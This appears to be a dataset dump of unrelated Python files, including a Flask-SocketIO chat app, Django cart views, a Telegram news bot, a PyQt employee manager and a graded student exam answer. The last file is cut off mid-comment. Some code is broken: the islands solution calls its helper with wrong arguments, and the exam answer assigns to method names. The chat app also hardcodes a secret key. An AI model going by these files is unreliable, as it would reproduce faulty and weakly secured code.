primary_key=True)),\n ('telefone', models.CharField(max_length=50)),\n ('contato', models.ForeignKey(to='contatos.Contato')),\n ],\n ),\n ]\n","sub_path":"contatos/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"416297446","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport time\nfrom collections import namedtuple\nfrom datetime import datetime\n\nimport mock\nimport pytest\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext import testbed\nfrom pytz import timezone\nfrom pytz import utc\n\nfrom yelp_beans import send_email\nfrom yelp_beans.logic.subscription import get_specs_from_subscription\nfrom yelp_beans.logic.subscription import store_specs_from_subscription\nfrom yelp_beans.models import MeetingSubscription\nfrom yelp_beans.models import Rule\nfrom yelp_beans.models import SubscriptionDateTime\nfrom yelp_beans.models import User\nfrom yelp_beans.models import UserSubscriptionPreferences\n\n\nFAKE_USER = [{\n 'first_name': 'Darwin',\n 'last_name': 'Yelp',\n 'email': 'darwin@yelp.com',\n 'photo_url': (\n 'https://s3-media4.fl.yelpcdn.com/assets/'\n 'srv0/yelp_large_assets/3f74899c069c'\n '/assets/img/illustrations/mascots/darwin@2x.png'\n ),\n 'department': 'Consumer',\n 'business_title': 'Engineer',\n}]\n\n\n@pytest.yield_fixture(scope='session', autouse=True)\ndef mock_config():\n with open('tests/test_data/config.yaml') as config_file:\n data = config_file.read()\n with mock.patch(\n 'yelp_beans.logic.config.open',\n mock.mock_open(read_data=data)\n ):\n yield\n\n\n@pytest.yield_fixture(scope='session', autouse=True)\ndef sendgrid_mock():\n \"\"\"This is active to prevent from sending a emails when testing\"\"\"\n with mock.patch.object(send_email, 'send_single_email'):\n yield\n\n\n@pytest.fixture\ndef minimal_database():\n my_testbed = testbed.Testbed()\n my_testbed.activate()\n my_testbed.init_datastore_v3_stub()\n my_testbed.init_memcache_stub()\n # Clear ndb's in-context cache between tests.\n ndb.get_context().clear_cache()\n\n\n@pytest.yield_fixture\ndef subscription():\n yield _subscription()\n\n\ndef _subscription():\n zone = 'US/Pacific'\n preference_1 = SubscriptionDateTime(datetime=datetime(2017, 1, 20, 23, 0, tzinfo=utc))\n # Easier to think/verify in Pacific time since we are based in SF\n assert preference_1.datetime.astimezone(timezone(zone)).hour == 15\n preference_1.datetime = preference_1.datetime.replace(tzinfo=None)\n preference_1.put()\n\n preference_2 = SubscriptionDateTime(datetime=datetime(2017, 1, 20, 19, 0, tzinfo=utc))\n # Easier to think/verify in Pacific time since we are based in SF\n assert preference_2.datetime.astimezone(timezone(zone)).hour == 11\n preference_2.datetime = preference_2.datetime.replace(tzinfo=None)\n preference_2.put()\n\n rule = Rule(name='office', value='USA: CA SF New Montgomery Office').put()\n\n subscription = MeetingSubscription(\n title='Yelp Weekly',\n size=2,\n location='8th Floor',\n office='USA: CA SF New Montgomery Office',\n timezone=zone,\n datetime=[preference_1.key, preference_2.key],\n user_rules=[rule]\n )\n subscription.put()\n return subscription\n\n\n@pytest.fixture\ndef database(minimal_database, subscription):\n MeetingInfo = namedtuple('MeetingInfo', ['sub', 'specs', 'prefs'])\n week_start, specs = get_specs_from_subscription(subscription)\n store_specs_from_subscription(subscription.key, week_start, specs)\n return MeetingInfo(\n subscription,\n specs,\n [\n subscription.datetime[0].get(),\n subscription.datetime[1].get()\n ]\n )\n\n\n@pytest.fixture\ndef database_no_specs(minimal_database, subscription):\n MeetingInfo = namedtuple('MeetingInfo', ['sub', 'specs', 'prefs'])\n return MeetingInfo(\n subscription,\n [],\n [\n subscription.datetime[0].get(),\n subscription.datetime[1].get()\n ]\n )\n\n\n@pytest.fixture\ndef employees():\n with open('tests/test_data/employees.json') as test_file:\n return test_file.read()\n\n\n@pytest.yield_fixture\ndef data_source():\n yield [\n {\n 'first_name': 'Sam',\n 'last_name': 'Smith',\n 'email': 'samsmith@yelp.com',\n 'photo_url': 'www.cdn.com/SamSmith.png',\n 'metadata': {\n 'department': 'Engineering',\n 'title': 'Engineer',\n 'floor': '10',\n 'desk': '100',\n 'manager': 'Bo Demillo'\n }\n },\n {\n 'first_name': 'Derrick',\n 'last_name': 'Johnson',\n 'email': 'derrickjohnson@yelp.com',\n 'photo_url': 'www.cdn.com/DerrickJohnson.png',\n 'metadata': {\n 'department': 'Design',\n 'title': 'Designer',\n 'floor': '12',\n 'desk': '102',\n 'manager': 'Tracy Borne'\n }\n }\n ]\n\n\n@pytest.yield_fixture\ndef data_source_by_key():\n yield {\n 'samsmith@yelp.com': {\n 'first_name': 'Sam',\n 'last_name': 'Smith',\n 'email': 'samsmith@yelp.com',\n 'photo_url': 'www.cdn.com/SamSmith.png',\n 'metadata': {\n 'department': 'Engineering',\n 'title': 'Engineer',\n 'floor': '10',\n 'desk': '100',\n 'manager': 'Bo Demillo'\n }\n },\n 'derrickjohnson@yelp.com': {\n 'first_name': 'Derrick',\n 'last_name': 'Johnson',\n 'email': 'derrickjohnson@yelp.com',\n 'photo_url': 'www.cdn.com/DerrickJohnson.png',\n 'metadata': {\n 'department': 'Design',\n 'title': 'Designer',\n 'floor': '12',\n 'desk': '102',\n 'manager': 'Derrick Johnson'\n }\n }\n }\n\n\n@pytest.fixture\ndef app():\n from webapp import app\n app.testing = True\n return app\n\n\n@pytest.fixture\ndef fake_user():\n yield _fake_user()\n\n\ndef _fake_user():\n user_list = []\n subscription = MeetingSubscription.query().get()\n for user in FAKE_USER:\n preferences = UserSubscriptionPreferences(\n preference=subscription.datetime[0],\n subscription=subscription.key,\n ).put()\n user_entity = User(\n first_name=user['first_name'],\n last_name=user['last_name'],\n email=user['email'],\n photo_url=user['photo_url'],\n metadata={\n 'department': user['department'],\n 'office': 'USA: CA SF New Montgomery Office',\n 'company_profile_url': 'https://www.yelp.com/user_details?userid=nkN_do3fJ9xekchVC-v68A',\n },\n subscription_preferences=[preferences],\n )\n user_entity.put()\n user_list.append(user_entity)\n return user_list[0]\n\n\ndef create_dev_data():\n email = FAKE_USER[0]['email']\n user = User.query(User.email == email).get()\n if not user:\n _subscription()\n time.sleep(2)\n _fake_user()\n\n subscription = MeetingSubscription.query().get()\n week_start, specs = get_specs_from_subscription(subscription)\n store_specs_from_subscription(subscription.key, week_start, specs)\n logging.info('generated fake date for dev')\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"204013226","text":"# Script to train machine learning model.\n\nfrom sklearn.model_selection import train_test_split\n\n# Add the necessary imports for the starter code.\nimport pandas as pd\nfrom ml.data import process_data\nfrom ml.model import train_model, compute_model_metrics, inference, save_to_file\nfrom data_slice import data_slice\n\nimport logging\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n\n# Add code to load in the data.\ndf = pd.read_csv('./data/census_no_spaces.csv')\n\n\ndef prepare_data(data):\n # Optional enhancement, use K-fold cross validation instead of a train-test split.\n train, test = train_test_split(data, test_size=0.20)\n\n cat_features = [\n \"workclass\",\n \"education\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"native-country\",\n ]\n feature = test[\"marital-status\"].to_numpy()\n\n X_train, y_train, encoder, lb = process_data(\n train, categorical_features=cat_features, label=\"salary\", training=True\n )\n\n # Proces the test data with the process_data function.\n X_test, y_test, test_encoder, test_lb = process_data(\n test, categorical_features=cat_features, label=\"salary\", training=False, encoder=encoder, lb=lb\n )\n\n save_to_file(encoder, \"encoder\")\n save_to_file(lb, \"labelbinarizer\")\n\n return X_train, y_train, X_test, y_test, feature\n\n\ndef train(X_train, y_train, X_test, y_test, feature):\n # Train and save a model.\n model = train_model(X_train, y_train)\n\n save_to_file(model, 'naive_bias.sav')\n\n preds = inference(model, X_test)\n\n precision, recall, fbeta = compute_model_metrics(y_test, preds)\n logger.info(f\"precision: {str(precision)} recall {str(recall)} fbeta {str(fbeta)}\")\n\n data_slice(feature, y_test, preds)\n\n\nX_train, y_train, X_test, y_test, feature = prepare_data(df)\n\ntrain(X_train, y_train, X_test, y_test, feature)\n","sub_path":"starter/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"482727165","text":"\"\"\"\r\n12.5/25 points\r\nFor this I wanted you guys to set up inheritance. You were close but didn't quite get there.\r\nAlso, your sides don't update to what the user inputs. \r\n\"\"\"\r\n\r\n\"\"\"\r\nPython Basics Performance Exam\r\n\r\n This exam is open note, open book, and open internet. Feel free to use any resources\r\n you can (other than someone else) to solve the following problems. Direct collaboration with another\r\n individual will result in immediate failure and consequences to follow. If you are unsure about \r\n whether or not you can use a resource please ask me. If you are unsure about any of the prompts I can clarify. \r\n\r\n Comments are necessary. \r\n\r\n Each problem will weigh the same towards the final grade. 4 Problems at 25% each. \r\n\r\n Please send each problem as a .py file separately. Please direct message them to me (Daniel Curran) \r\n through slack. If there are supporting files for a problem then please send them with the .py file \r\n as a zipped folder. \r\n\r\n You will have 3 hours to complete this exam. If you complete this portion early and I have verified\r\n I have everything needed to grade your exam then you will be released.\r\n\r\n Happy Thanksgiving. \r\n\r\n3. \r\n(The Triangle class) Design a class named Triangle that extends the\r\nGeometricObject class defined below. The Triangle class contains:\r\n - Three float data fields named side1, side2, and side3 to denote the three\r\n sides of the triangle.\r\n - A constructor that creates a triangle with the specified side1, side2, and\r\n side3 with default values 1.0.\r\n - The accessor methods for all three data fields.\r\n - A method named getArea() that returns the area of this triangle.\r\n - A method named getPerimeter() that returns the perimeter of this triangle.\r\n - A method named __str__() that returns a string description for the triangle.\r\n\r\n\r\n class GeometricObject:\r\n def __init__(self, color = \"green\", filled = True):\r\n self.color = color\r\n self.filled = filled\r\n\r\n def getColor(self):\r\n return self.color\r\n\r\n def setColor(self, color):\r\n self.color = color\r\n\r\n def isFilled(self):\r\n return self.filled\r\n\r\n def setFilled(self, filled):\r\n self.filled = filled\r\n \r\n def toString(self):\r\n return \"color: \" + self.color + \" and filled: \" + str(self.filled)\r\n\r\n\r\n Write a test program that prompts the user to enter the three sides of the \r\n triangle, a color, and 1 or 0 to indicate whether the triangle is filled. \r\n The program should create a Triangle object with these sides and set the \r\n color and filled properties using the input. The program should display the \r\n triangle’s area, perimeter, color, and True or False to indicate whether the \r\n triangle is filled or not.\r\n\r\n\"\"\"\r\n# Import the things\r\nfrom shapes1 import GeometricObject as go \r\nfrom shapes1 import TriangleObject as tr\r\n# Define the mian function\r\ndef main():\r\n # get the values to set\r\n side1 = float(input(\"Enter the length of side 1: \"))\r\n side2 = input(\"Enter the length of side 2: \")\r\n side3 = input(\"Enter the length of side 3: \")\r\n color = input(\"Enter the color you want the shape to be: \")\r\n filled = input(\"Enter 1 if you want the shape filled and 0 if you do not: \")\r\n # set the values\r\n tr.set_side1 = side1\r\n tr.set_side2 = side2\r\n tr.set_side3 = side3\r\n go.setColor = color\r\n # if the user picks a goot selection then set it. If not then default\r\n if filled == \"1\":\r\n go.setFilled = True\r\n elif filled == \"0\":\r\n go.setFilled = False\r\n else:\r\n print(\"You did not enter appropriate input for filling the shape so we will default: \")\r\n go.setColor = True\r\n # Display the data\r\n print(tr())\r\n print(go())\r\n \r\n \r\n\r\n\r\nmain()","sub_path":"Curriculum/My Git Stuff/05PythonProgramming/Additional Stuff/Test Stuff/First Test/Hackett_Python_Basics_Performance/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"298773389","text":"from flask import Flask, render_template,request,session\nfrom flask_socketio import SocketIO, send,emit,join_room, leave_room, ConnectionRefusedError\nimport uuid\nfrom flask_sqlalchemy import SQLAlchemy\n\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\n# socketio = SocketIO(app,logger=True, engineio_logger=True)\nsocketio = SocketIO(app)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///chat.db'\ndb = SQLAlchemy(app)\n\n\ndb.session.execute('CREATE TABLE IF NOT EXISTS user (id INTEGER PRIMARY KEY AUTOINCREMENT, email TEXT email NOT NULL UNIQUE, username TEXT)')\ndb.session.execute('CREATE TABLE IF NOT EXISTS myroom (id INTEGER PRIMARY KEY AUTOINCREMENT, roomname TEXT, key TEXT, email NOT NULL UNIQUE)')\ndb.session.commit()\n\n\n@app.route('/')\ndef home(username):\n return render_template('index.html',user=username)\n\n@app.route(\"/chat//\")\ndef generate_room_key(roomname,email):\n roomname=roomname\n email=email\n key=str(uuid.uuid1())\n # print(request.sid)\n db.engine.execute(\"INSERT INTO myroom (roomname,key,email) VALUES(?,?,?)\",(roomname,key,email))\n # print(user,request.sid)\n db.session.commit()\n data={'roomname':roomname,\"key\":key,\"email\":email}\n return data\n# @app.route('/')\n# def index(username):\n# # user=username\n# # session[\"username\"]=username\n# return render_template('session.html',user=username)\n\n@socketio.on('my event')\ndef test_message(message):\n emit('my response', {'data': message['data']})\n\n# @socketio.on('my broadcast event')\n# def test_message(message):\n# emit('my response', {'data': message['data']}, broadcast=True)\n\n_user={}\n@app.route(\"/chat/\")\ndef chat(user):\n _user[\"user\"]=user\n return render_template(\"chat.html\",user=user)\n\n@socketio.on('connect')\ndef test_connect():\n # if True:\n # raise ConnectionRefusedError('unauthorized!')\n print(\"connected\",request.sid)\n emit('my response', {'data': 'Connected'})\n\n\nroomID={}\nkey_session={}\n@socketio.on('create_room')\ndef create_room(msg):\n roomname = msg['roomname']\n _id=str(uuid.uuid1())\n roomID[roomname]=_id\n # session['username']=msg['username']\n key_session[request.sid]=_id\n\n print(roomname,roomID)\n room = _id\n join_room(room)\n emit('private_room',{'roomID':room, \"roomname\":roomname,'username':session['username']},to=room)\n # send(username + ' has entered the room.'+room, to=room)\n\n\n\n\n@socketio.on('join')\ndef join(msg):\n roomname = msg['roomname']\n _id = msg['roomID']\n\n try:\n room_and_key=db.engine.execute(\"SELECT key,roomname,email from myroom where id=?\",_id).fetchone()\n key,roomname=room_and_key[0],room_and_key[1]\n join_room(key)\n key_session[request.sid]=_user[\"user\"]\n roomname = f\"{_user['user']} has joined the room {msg['roomname']}\"\n # roomID[\"room\"]=msg['roomID']\n # print(roomname,roomID)\n print(\"this s join id:\",_id)\n print(\"ID check\",msg['roomID'],\"/n\",key_session[request.sid])\n emit('join',{'data':roomname, \"user\":_id}, room=key)\n # send(username + ' has entered the room.'+room, to=room)\n except:\n join_room('404')\n emit('chat',{'data':\"Roomname not found 404\", \"user\":\"entered id didn't found\"}, room='404')\n raise ConnectionRefusedError('unauthorized!')\n emit('disconnect',room='404')\n\n\n@socketio.on('my broadcast event')\ndef test_message(message):\n _id = message['room']\n # print(\"here is the room\",roomID[\"room\"])\n # print(\"here is the user\",_user[\"user\"],key_session[request.sid])\n\n room_and_key=db.engine.execute(\"SELECT key,roomname,email from myroom where id=?\",_id).fetchone()\n key,roomname=room_and_key[0],room_and_key[1]\n # if request.sid in roomID[_id]:\n emit('chat', {'data': message['data'],\"user\":key_session[request.sid]},room=key)\n\n\n@socketio.on('disconnect')\ndef test_disconnect():\n print('Client disconnected')\n emit('my response', {'data': 'DisConnected'})\n\nif __name__ == '__main__':\n socketio.run(app,debug=0)","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"587176624","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_POST\nfrom vinyl_records.models import Record\n\nfrom .models import Cart\nfrom .forms import CartAddProductForm\n\nfrom decimal import Decimal\nfrom django.conf import settings\n# Create your views here.\n\n\n@require_POST\ndef cart_add(request, record_id):\n cart = Cart(request)\n record = get_object_or_404(Record, id=record_id)\n form = CartAddProductForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n cart.add(record=record, quantity=cd['quantity'],\n update_quantity=cd['update'])\n return redirect('cart:cart_detail')\n\ndef cart_remove(request, record_id):\n cart = Cart(request)\n record = get_object_or_404(Record,id=record_id)\n cart.remove(record)\n return redirect('cart:cart_detail')\n\ndef cart_detail(request):\n cart = Cart(request)\n for item in cart:\n item['update_quantity_form'] = CartAddProductForm(\n initial={\n 'quantity': item['quantity'],\n 'update': True\n })\n return render(request, 'cart/detail.html', {'cart': cart})\n\n@require_POST\ndef cart_clear(request):\n cart = Cart(request)\n cart.clear()\n return render(request, 'cart/detail.html', {'cart': cart})\n","sub_path":"web/vinyl_shop/vinyl_shop/cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"102538109","text":"def num_distinct_islands(grid):\n def dfs(grid, row, col, path):\n if not (0 <= row < len(grid) and 0 <= col < len(grid[0]) and grid[row][col] == 1):\n return \"\"\n\n grid[row][col] = 0\n return path + dfs(grid, row - 1, col, \"d\") + \"u\" + dfs(grid, row + 1, row, col, \"u\") + \"d\" + dfs(grid, row, col - 1, \"r\") + \"l\" + dfs(grid, row, col + 1, \"l\") + \"r\"\n\n\n\n ans = set()\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n path = dfs(grid, i, j, \"s\")\n print(path)\n ans.add(path)\n\n return len(ans)\n\n\nprint(num_distinct_islands([[1,1,0,0,0],\n[1,1,0,0,0],\n[0,0,0,1,1],\n[0,0,0,1,1]]))\n","sub_path":"694_num_distinct_islands.py","file_name":"694_num_distinct_islands.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"447287890","text":"import argparse\nimport calendar\nimport time\n\ntime_now = calendar.timegm(time.gmtime())\n\nparser = argparse.ArgumentParser(description='--t \"\"')\nparser.add_argument(\"--t\", default=time_now, help=\"'current epoch time is `date +%s`'\")\nargs = parser.parse_args()\nt = args.t\n\n\ndef epoch():\n # print current epoch if no argument & exit\n if t == time_now:\n print(\"Current EPOCH time is: \" + (str(t)))\n exit()\n\n human_time = time.strftime('%m/%d/%Y %H:%M:%S', time.localtime(int(t)))\n print(\"Human-readable date:\\n\" + human_time)\n\n\nepoch()\n","sub_path":"lz_epoch_converter/epoch.py","file_name":"epoch.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"244984634","text":"import telebot\nimport datetime\nfrom decouple import config\nimport finnhub\nfrom time import sleep\nimport datetime\nimport schedule\nimport time\n\n\nbot = telebot.TeleBot(config('TELEGRAM_BOT_KEY'), parse_mode='HTML')\nsome_id = int('-1001515068629')\n\n\nclass Apihandler:\n def __init__(self, finnhub_client):\n self.finnhub_client = finnhub.Client(api_key=finnhub_client)\n\n def get_news(self, time_setter):\n news_list = []\n for item in self.finnhub_client.general_news('general', min_id=0):\n date_parsed = datetime.datetime.fromtimestamp(item['datetime'])\n item_hour = str(datetime.datetime.fromtimestamp(\n item['datetime'])).split(' ')[1][0:2]\n if str(date_parsed).split(' ')[0] == str(datetime.date.today()) and int(item_hour) >= time_setter:\n news_list.append(\n f\"{item['source']}: {item['headline']} \\n {item['url']} \\n {date_parsed} \\n\\n\")\n return news_list\n\n\ndef function_to_run():\n api = Apihandler(config('FINNHUBCLIENT_API_KEY'))\n\n if datetime.datetime.now().hour == 7:\n for item in api.get_news(0):\n bot.send_message(some_id, item)\n sleep(4)\n elif datetime.datetime.now().hour == 11:\n for item in api.get_news(7):\n bot.send_message(some_id, item)\n sleep(4)\n elif datetime.datetime.now().hour == 15:\n for item in api.get_news(11):\n bot.send_message(some_id, item)\n sleep(4)\n elif datetime.datetime.now().hour == 19:\n for item in api.get_news(15):\n bot.send_message(some_id, item)\n sleep(4)\n\n\nif __name__ == \"__main__\":\n schedule.every().day.at(\"07:00\").do(function_to_run)\n schedule.every().day.at(\"11:00\").do(function_to_run)\n schedule.every().day.at(\"15:00\").do(function_to_run)\n schedule.every().day.at(\"19:00\").do(function_to_run)\n\n while True:\n schedule.run_pending()\n time.sleep(1)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"125382313","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QInputDialog, QWidget, QStackedWidget\nfrom models import *\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom ui.main_window import Ui_MainWindow as Main_window\nfrom ui.new_employee_window import Ui_MainWindow as New_employee_window\nfrom table_manager import table_manager\n\nclass EmployeeManager:\n\tdef __init__(self):\n\t\tself.engine = create_engine('sqlite:///employee_manager.db')\n\t\tBase.metadata.create_all(self.engine)\n\t\tDBSession = sessionmaker(bind=self.engine)\n\t\tself.session = DBSession()\n\n\t\tself.employees = {}\n\t\tfor employee in self.session.query(Employee).all():\n\t\t\tself.employees[employee.id] = (employee.fullname, employee.position, employee.pay, str(employee.id))\n\n\t\tself.app = QApplication(sys.argv)\n\t\tself.window = QMainWindow()\n\n\t\tself.main_window = Main_window()\n\t\tself.new_employee_window = New_employee_window()\n\n\t\tself.focus_main()\n\n\t\tself.window.show()\n\t\tsys.exit(self.app.exec_())\n\n\tdef add_employee(self):\n\t\tname = self.new_employee_window.fullName.text()\n\t\tposition = self.new_employee_window.position.text()\n\t\tpay = self.new_employee_window.pay.text()\n\n\t\tif name != '' and position != '' and pay != '':\n\t\t\tnew_employee = Employee(fullname=name, position=position, pay=pay)\n\t\t\tself.employees[str(new_employee.id)] = (new_employee.fullname, new_employee.position, new_employee.pay, str(new_employee.id))\n\t\t\tself.session.add(new_employee)\n\t\t\tself.session.commit()\n\t\t\tself.focus_main()\n\n\t\telse:\n\t\t\tpass\n\n\tdef edit_employee(self):\n\t\tname = self.new_employee_window.fullName.text()\n\t\tposition = self.new_employee_window.position.text()\n\t\tpay = self.new_employee_window.pay.text()\n\n\t\tif name != '' and position != '' and pay != '':\n\t\t\temployee = self.session.query(Employee).filter_by(id=self.info[3]).first()\n\t\t\temployee.fullname = name\n\t\t\temployee.position = position\n\t\t\temployee.pay = pay\n\t\t\tself.employees[employee.id] = (employee.fullname, employee.position, employee.pay, str(employee.id))\n\t\t\tself.session.commit()\n\t\t\tself.focus_main()\n\n\t\telse:\n\t\t\tpass\n\n\tdef focus_new_employee(self):\n\t\tself.new_employee_window.setupUi(self.window)\n\n\t\tself.new_employee_window.cancel.clicked.connect(self.focus_main)\n\t\tself.new_employee_window.addEmployee.clicked.connect(self.add_employee)\n\n\tdef focus_edit_employee(self):\n\t\tinfo = [i.text() for i in self.tm.table.selectedItems()]\n\t\tself.new_employee_window.setupUi(self.window)\n\n\t\tself.new_employee_window.fullName.setText(info[0])\n\t\tself.new_employee_window.position.setText(info[1])\n\t\tself.new_employee_window.pay.setText(info[2])\n\t\tself.info = info\n\n\t\tself.new_employee_window.cancel.clicked.connect(self.focus_main)\n\t\tself.new_employee_window.addEmployee.setText('Edit Employee')\n\t\tself.new_employee_window.addEmployee.clicked.connect(self.edit_employee)\n\n\tdef focus_main(self):\n\t\tself.main_window.setupUi(self.window)\n\n\t\tself.tm = table_manager(self.main_window.employeeTables)\n\n\t\tfor key, val in self.employees.items():\n\t\t\tself.tm.add_row(val)\n\t\t\t\n\t\tself.main_window.addEmployeeDialog.clicked.connect(self.focus_new_employee)\n\t\tself.tm.table.clicked.connect(self.focus_edit_employee)\n\nEmployeeManager()","sub_path":"src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"448083814","text":"from django.conf.urls import url\nfrom django.contrib import admin\n\nfrom .views import *\n\nurlpatterns = [\n url(r'^$', index, name=\"index\"),\n url(r'^about-us/$', about_us, name=\"about-us\"),\n url(r'^careers/$', careers, name=\"careers\"),\n url(r'^partners/$', partners, name=\"partners\"),\n url(r'^demo/bookings/$', demo_bookings, name='demo-booking'),\n]\n","sub_path":"ajabcapital/apps/website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"602608499","text":"#!/usr/bin/env python\n\nfrom tkinter import *\nimport sqlite3\nimport os\nimport tkinter as tk\n\n\n\n# Represents the GUI window.\nclass MenuGUI():\n\n def __init__(self):\n\n self.root = tk.Tk()\n self.root.title(\"GUI for store data\")\n # set the variable\n self.window_height = 700\n\n self.sidebar_width = 200\n\n self.main_area_width = 400\n\n self.sidebar_bg_color = 'white'\n\n self.mainarea_bg_color = '#CCC'\n\n # calling the sidebar method\n self._set_sidebar()\n\n # initialize the frames with empty everything\n self.mainarea_tshirt = tk.Frame(self.root)\n\n self.mainarea_posters = tk.Frame(self.root)\n\n self.mainarea_boots = tk.Frame(self.root)\n\n # calling the frame to show initially\n self._only_tshirt_show()\n\n\n def _set_sidebar(self):\n\n sidebar = tk.Frame(\n self.root, width = self.sidebar_width, bg = self.sidebar_bg_color, height = self.window_height, relief = 'sunken', borderwidth = 2)\n sidebar.pack(expand=True, fill='both', side = 'left', anchor = 'nw')\n\n # adding the T shirt button on right side-bar\n # relx and rely are the attribute which set the postsion\n\n tshirt = tk.Button(self.root, text = \"T-shirt\", command=self._only_tshirt_show)\n\n tshirt.pack()\n\n tshirt.place(bordermode = OUTSIDE, height = 50, width = self.sidebar_width, relx=.0, rely=.001)\n\n # adding the Poster button on right side-bar\n # relx and rely are the attribute which set the postsion\n posters = tk.Button(self.root, text =\"Posters\", command=self._only_posters_show)\n\n posters.pack()\n\n posters.place(bordermode = OUTSIDE, height = 50, width = self.sidebar_width,relx=.0, rely=.09)\n\n # adding the Boots button on right side-bar\n # relx and rely are the attribute which set the postsion\n\n boots = tk.Button(self.root, text =\"Boots\", command=self._only_boot_show)\n\n boots.pack()\n\n boots.place(bordermode = OUTSIDE, height = 50, width = self.sidebar_width,relx=.0, rely=.179)\n\n\n \"\"\"\n This method will hide all the displays and show only the\n t-shirt window\n \"\"\"\n def _only_tshirt_show(self):\n\n \"\"\"\n Below line destroy the all frames\n \"\"\"\n\n # destroy the all frames\n self.mainarea_tshirt.destroy()\n\n self.mainarea_posters.destroy()\n\n self.mainarea_boots.destroy()\n\n self.root.update()\n\n self.root.minsize(self.main_area_width,self.window_height)\n\n self.mainarea_tshirt = tk.Frame(self.root, bg = self.mainarea_bg_color, width = self.main_area_width, height = self.window_height)\n\n self.mainarea_tshirt.pack(expand = True, fill = 'both', side = 'right')\n\n Label(self.mainarea_tshirt, text=\"T shirt name\").pack()\n\n self._storeVar = StringVar()\n self._tablename = \"tshirts\"\n\n # adding the Entry (text-field) on frame\n # adding the button on the text field\n # command attribute in button will execute the method or command\n\n Entry(self.mainarea_tshirt, textvariable=self._storeVar, width=30).pack()\n\n Button(self.mainarea_tshirt, text=\"Enter\",width=27, command=self._enter_data).pack()\n\n self.root.mainloop()\n\n \"\"\"\n This mestod will hide all the displays and show only the\n Posters window\n \"\"\"\n def _only_posters_show(self):\n\n # destroy the all frames\n self.mainarea_tshirt.destroy()\n\n self.mainarea_posters.destroy()\n\n self.mainarea_boots.destroy()\n\n\n self.root.update()\n\n self.root.minsize(self.main_area_width,self.window_height)\n\n self.mainarea_posters = tk.Frame(self.root, bg = self.mainarea_bg_color, width = self.main_area_width, height = self.window_height)\n\n self.mainarea_posters.pack(expand = True, fill = 'both', side = 'right')\n\n Label(self.mainarea_posters, text=\"Poster name\").pack()\n\n self._storeVar = StringVar()\n self._tablename = \"posters\"\n\n # adding the Entry (text-field) on frame\n # adding the button on the text field\n # command attribute in button will execute the method or command\n\n Entry(self.mainarea_posters, textvariable=self._storeVar, width=30).pack()\n\n Button(self.mainarea_posters, text=\"Enter\",width=27, command=self._enter_data).pack()\n\n self.root.mainloop()\n\n\n \"\"\"\n This mestod will hide all the displays and show only the\n Boot window\n \"\"\"\n def _only_boot_show(self):\n\n # destroy the all frames\n self.mainarea_tshirt.destroy()\n self.mainarea_posters.destroy()\n self.mainarea_boots.destroy()\n\n self.root.update()\n\n self.root.minsize(self.main_area_width,self.window_height)\n\n self.mainarea_boots = tk.Frame(self.root, bg = self.mainarea_bg_color, width = self.main_area_width, height = self.window_height)\n\n self.mainarea_boots.pack(expand = True, fill = 'both', side = 'right')\n\n Label(self.mainarea_boots, text=\"Boot name\").pack()\n\n self._storeVar = StringVar()\n self._tablename = \"boots\"\n\n # adding the Entry (text-field) on frame\n # adding the button on the text field\n # command attribute in button will execute the method or command\n Entry(self.mainarea_boots, textvariable=self._storeVar, width=30).pack()\n\n Button(self.mainarea_boots, text=\"Enter\",width=27, command=self._enter_data).pack()\n\n self.root.mainloop()\n\n \"\"\"\n This method call when the button the side-bar is clicked\n This method get the values from the \"Entry\" widget and\n insert in the database\n \"\"\"\n def _enter_data(self):\n storeVar = self._storeVar.get()\n db = sqlite3.connect(\"database_filename\")\n cursor = db.cursor()\n cursor.execute('insert into %s (name) values (?)'%self._tablename, (storeVar,))\n db.commit()\n \"\"\"\n select data from the database and show them\n on the console.\n \"\"\"\n for row in cursor.execute('SELECT * FROM %s'%self._tablename):\n print (row)\n db.close()\n\n\n\ndef setup_database():\n\n # checking the database file is exist\n # if the file is exist\n # remove the existing data and create the new database\n if 